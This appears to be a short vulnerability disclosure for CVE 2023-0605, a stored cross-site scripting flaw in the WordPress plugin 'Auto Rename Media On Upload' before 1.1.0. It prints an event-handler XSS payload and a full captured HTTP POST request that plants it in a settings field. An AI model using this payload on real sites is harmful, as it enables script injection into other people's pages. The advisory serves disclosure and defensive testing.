Auto Rename Media On Upload < 1.1.0 – Admin+ Stored XSS | CVE 2023-0605

Description

The plugin does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup).

Proof of Concept

1. Go to the plugin's settings, and insert the following payload in any field: "OnMoUsEoVeR=prompt(1)//
2. Save the settings, and hover over the field.
3. A JavaScript alert will trigger.



"OnMoUsEoVeR=prompt(1)//

burpsuite packge：

POST /wp-admin/options-general.php?page=auto-rename-media-on-upload HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:85.0) Gecko/20100101 Firefox/85.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Referer: http://wp55.com/wp-admin/options-general.php?page=auto-rename-media-on-upload
Content-Type: application/x-www-form-urlencoded
Content-Length: 440
DNT: 1
Connection: close
Cookie: wordpress_cookie


_wpnonce=71ba0b51f0&_wp_http_referer=%2Fwp-admin%2Foptions-general.php%3Fpage%3Dauto-rename-media-on-upload&oJPG=%22OnMoUsEoVeR%3Dprompt%281%29%2F%2F&oPNG=&oBMP=&oGIF=&oTIF=&oMP4=&oAVI=&oM4V=&oMOV=&oFLV=&oMKV=&o3GP=&oMPG=&oMP3=&oOGG=&oWAV=&oPDF=&oDOC=&oXLS=&oPPT=&oZIP=&oCSV=&oTXT=&oRTF=&oODT=&oOTHER=&_wpnonce=71ba0b51f0&_wp_http_referer=%2Fwp-admin%2Foptions-general.php%3Fpage%3Dauto-rename-media-on-upload&buttonSaveChanges=Save+Changes